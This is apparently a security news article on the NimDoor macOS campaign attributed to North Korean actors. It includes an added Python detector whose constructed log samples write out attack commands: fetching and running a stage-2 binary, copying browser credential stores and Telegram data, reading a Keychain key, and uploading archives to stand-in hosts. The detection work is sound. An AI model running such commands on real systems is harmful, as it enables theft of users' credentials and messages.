SentinelLabs, the threat intelligence arm of cybersecurity company SentinelOne, has uncovered a sophisticated attack campaign known as NimDoor, targeting macOS systems and allegedly orchestrated by North Korean state-sponsored actors.
According to SentinelLabs' report, the campaign opens with social engineering: the attackers impersonate a trusted contact, propose a meeting through Calendly, and then send a fraudulent email asking the victim to install a Zoom SDK update before the call. The linked AppleScript is padded with thousands of blank lines so that its three lines of malicious code are easy to overlook; those three lines fetch and execute a second-stage payload.
Once that script runs, two Mach-O binaries are pulled down from a server made to look like legitimate Zoom infrastructure. They start two separate execution chains: one collects general system information and application-specific data; the other establishes persistent access to the host.
A trojan binary then drops two Bash scripts. The first harvests data from the Arc, Brave, Firefox, Chrome and Edge browsers. The second collects the encrypted Telegram database together with the blob needed to decrypt it. Both scripts send what they gather to a command-and-control server.
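Read as telemetry, the chain above gives a defender several pivots that do not depend on file hashes: a downloader spawned from osascript, one shell script touching the profile directories of several browsers, Telegram's data directory being read together with a Keychain item, and an HTTP POST from the same script tree afterwards. The Python below is an added example, not code from the SentinelLabs report or from the campaign; it runs those four heuristics over constructed process-start records in the shape of a hypothetical EDR export (JSON lines with pid, ppid, process name and command line). Script and file names (`zoom_sdk_support.scpt`, `/tmp/a`, `browsers.sh`, `telegram.sh`), hostnames under `example.test`, the browser profile paths and the Telegram container name are assumptions chosen for illustration.

```python
"""Heuristic detector for a NimDoor-style chain (added example, not the report's code).
Input: hypothetical EDR export, one JSON object per process start with
pid, ppid, proc (image name) and cmdline. All records below are constructed."""
import json
import re
from collections import defaultdict
from itertools import islice

SHELLS = {"sh", "bash", "zsh"}
FETCHERS = {"curl", "nscurl", "wget"}
# Browser profile directories on macOS (default install locations; assumed).
BROWSER_STORES = {
    "Chrome": re.compile(r"Application Support/Google/Chrome/"),
    "Brave": re.compile(r"Application Support/BraveSoftware/"),
    "Arc": re.compile(r"Application Support/Arc/"),
    "Firefox": re.compile(r"Application Support/Firefox/Profiles"),
    "Edge": re.compile(r"Application Support/Microsoft Edge/"),
}
TELEGRAM_STORE = re.compile(r"Group Containers/[^/\s]*Telegram")  # app-group container name assumed
KEYCHAIN_READ = re.compile(r"\bsecurity\s+find-generic-password\b")
HTTP_POST = re.compile(r"(?:\s-F\s|\s-d\s|--data|-X\s*POST)")

# Constructed sample: osascript -> sh -> curl fetches stage 2, which runs two shell scripts that
# steal browser stores and Telegram data and upload them. pids 900-902 are a benign backup control.
SAMPLE_LOG = """
{"pid": 500, "ppid": 1, "proc": "zoom.us", "cmdline": "/Applications/zoom.us.app/Contents/MacOS/zoom.us"}
{"pid": 601, "ppid": 1, "proc": "osascript", "cmdline": "osascript /Users/dev/Downloads/zoom_sdk_support.scpt"}
{"pid": 602, "ppid": 601, "proc": "sh", "cmdline": "sh -c curl -sL https://sdk-update.example.test/s2 -o /tmp/a && chmod +x /tmp/a && /tmp/a"}
{"pid": 603, "ppid": 602, "proc": "curl", "cmdline": "curl -sL https://sdk-update.example.test/s2 -o /tmp/a"}
{"pid": 604, "ppid": 602, "proc": "a", "cmdline": "/tmp/a"}
{"pid": 700, "ppid": 604, "proc": "bash", "cmdline": "bash /tmp/browsers.sh"}
{"pid": 701, "ppid": 700, "proc": "cp", "cmdline": "cp /Users/dev/Library/Application Support/Google/Chrome/Default/Login Data /tmp/out/chrome"}
{"pid": 702, "ppid": 700, "proc": "cp", "cmdline": "cp /Users/dev/Library/Application Support/BraveSoftware/Brave-Browser/Default/Cookies /tmp/out/brave"}
{"pid": 703, "ppid": 700, "proc": "cp", "cmdline": "cp -R /Users/dev/Library/Application Support/Firefox/Profiles /tmp/out/firefox"}
{"pid": 704, "ppid": 700, "proc": "curl", "cmdline": "curl -s -F data=@/tmp/out.zip https://drop.example.test/upload"}
{"pid": 800, "ppid": 604, "proc": "bash", "cmdline": "bash /tmp/telegram.sh"}
{"pid": 801, "ppid": 800, "proc": "zip", "cmdline": "zip -r /tmp/tg.zip /Users/dev/Library/Group Containers/TEAMID.ru.keepcoder.Telegram"}
{"pid": 802, "ppid": 800, "proc": "security", "cmdline": "security find-generic-password -a ru.keepcoder.Telegram -w"}
{"pid": 803, "ppid": 800, "proc": "curl", "cmdline": "curl -s -X POST --data-binary @/tmp/tg.zip https://drop.example.test/upload"}
{"pid": 900, "ppid": 1, "proc": "bash", "cmdline": "bash /Users/dev/backup.sh"}
{"pid": 901, "ppid": 900, "proc": "cp", "cmdline": "cp /Users/dev/Library/Application Support/Google/Chrome/Default/Bookmarks /Volumes/Backup/"}
{"pid": 902, "ppid": 900, "proc": "curl", "cmdline": "curl -s -F file=@/Volumes/Backup/site.tgz https://backup.example.test/put"}
"""


def parse(log):
    return [json.loads(line) for line in log.strip().splitlines() if line.strip()]


def lineage(by_pid, pid):
    """Parent events of pid, nearest first; stops at a ppid we have no record for (e.g. launchd)."""
    seen, ev = {pid}, by_pid.get(pid)
    while ev is not None and ev["ppid"] in by_pid and ev["ppid"] not in seen:
        ev = by_pid[ev["ppid"]]
        seen.add(ev["pid"])
        yield ev


def script_root(by_pid, pid):
    """Nearest shell in the lineage (self included): the script a command belongs to."""
    if by_pid[pid]["proc"] in SHELLS:
        return pid
    return next((a["pid"] for a in lineage(by_pid, pid) if a["proc"] in SHELLS), None)


def detect(events):
    by_pid = {e["pid"]: e for e in events}
    findings, browsers, telegram, keychain = [], defaultdict(set), set(), set()
    for ev in events:
        cmd, root = ev["cmdline"], script_root(by_pid, ev["pid"])
        # Rule 1: a downloader whose grandparent is osascript (the `do shell script` shape: curl -> sh -> osascript)
        if ev["proc"] in FETCHERS and any(a["proc"] == "osascript" for a in islice(lineage(by_pid, ev["pid"]), 2)):
            findings.append({"pid": ev["pid"], "rule": "fetch_from_applescript", "detail": cmd})
        if root is None:
            continue
        browsers[root].update(name for name, rx in BROWSER_STORES.items() if rx.search(cmd))
        if TELEGRAM_STORE.search(cmd):
            telegram.add(root)
        if KEYCHAIN_READ.search(cmd):
            keychain.add(root)
    harvest_roots = set()
    # Rule 2: one script reading the stores of two or more browsers is harvesting, not a single-app backup
    for root in sorted(browsers):
        if len(browsers[root]) >= 2:
            harvest_roots.add(root)
            findings.append({"pid": root, "rule": "browser_store_harvest", "detail": ", ".join(sorted(browsers[root]))})
    # Rule 3: Telegram data directory read; a Keychain read by the same script means the decryption key goes too
    for root in sorted(telegram):
        harvest_roots.add(root)
        detail = "Telegram data dir" + (" + keychain item" if root in keychain else "")
        findings.append({"pid": root, "rule": "telegram_store_access", "detail": detail})
    # Rule 4: an HTTP POST from a script tree already flagged as harvesting is the exfiltration step
    for ev in events:
        if ev["proc"] in FETCHERS and HTTP_POST.search(ev["cmdline"]) and script_root(by_pid, ev["pid"]) in harvest_roots:
            findings.append({"pid": ev["pid"], "rule": "exfil_after_harvest", "detail": ev["cmdline"]})
    return findings


if __name__ == "__main__":
    for f in detect(parse(SAMPLE_LOG)):
        print(f"pid {f['pid']:>4}  {f['rule']:<24} {f['detail']}")
```

The control records (pids 900 to 902) show why rule 2 requires two or more browsers and rule 4 requires an already-flagged script root: a backup script that copies one Chrome directory and then uploads an archive matches neither. Real telemetry would expose file reads as separate events rather than in command lines; the same grouping by script root applies to those.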
The campaign's complexity is heightened by its use of the Nim programming language. Nim is still uncommon in malware, so analysts have fewer reference samples, tooling and signatures to draw on, which complicates detection and analysis.
Blockchain investigator ZachXBT has separately traced financial flows that may be linked to the same actors. By his account, roughly $2.76 million in USDC is sent each month from Circle accounts to wallets associated with IT workers from the Democratic People's Republic of Korea (DPRK).
Those addresses are reportedly tied to previously sanctioned individuals, including Sim Hyun Sop, whose addresses Tether blacklisted in 2023. ZachXBT notes that hiring North Korean developers significantly raises the risk to a project's integrity and security.
"Hiring multiple DPRK IT workers is a strong indicator a startup will eventually fail. These workers are not particularly skilled — the risk often stems from the hiring team's negligence," ZachXBT warned.